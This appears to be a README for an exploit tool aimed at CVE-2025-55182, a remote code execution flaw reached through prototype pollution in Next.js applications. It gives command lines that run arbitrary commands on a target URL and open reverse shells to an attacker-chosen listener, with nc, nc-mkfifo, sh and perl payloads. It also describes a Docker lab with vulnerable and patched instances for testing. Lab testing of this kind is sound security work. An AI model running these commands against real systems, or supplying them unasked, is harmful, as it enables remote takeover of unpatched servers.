Exploits CVE-2025-55182 for remote code execution via prototype pollution.
```bash
uv sync
source .venv/bin/activate
```

```bash
python3 exploit.py -u https://example.com -c "id"
python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo
```

- `-u, --url`: URL/host to check (required)
- `-c, --cmd`: Command to execute
- `-r, --reverse`: Enable reverse shell mode
- `-l, --lhost`: Listener host for reverse shell
- `-p, --lport`: Listener port for reverse shell
- `-P, --payload`: Reverse shell payload type: `nc`, `nc-mkfifo`, `sh`, `perl` (default: `nc`)
- `--timeout`: Request timeout in seconds (default: 10)
```bash
# Execute command
python3 exploit.py -u https://example.com -c "whoami"

# Reverse shell with nc-mkfifo (recommended for Alpine)
python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo
```

The `lab/` directory contains a complete Docker setup for testing the exploit.
```bash
cd lab
docker-compose up -d
```

This will start two services:
- vulnerable: Vulnerable Next.js application on port 3011
- patched: Patched Next.js application on port 3012
```bash
# Test on vulnerable instance
python3 exploit.py -u http://localhost:3011 -c "id"

# Test reverse shell (get gateway IP first)
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
```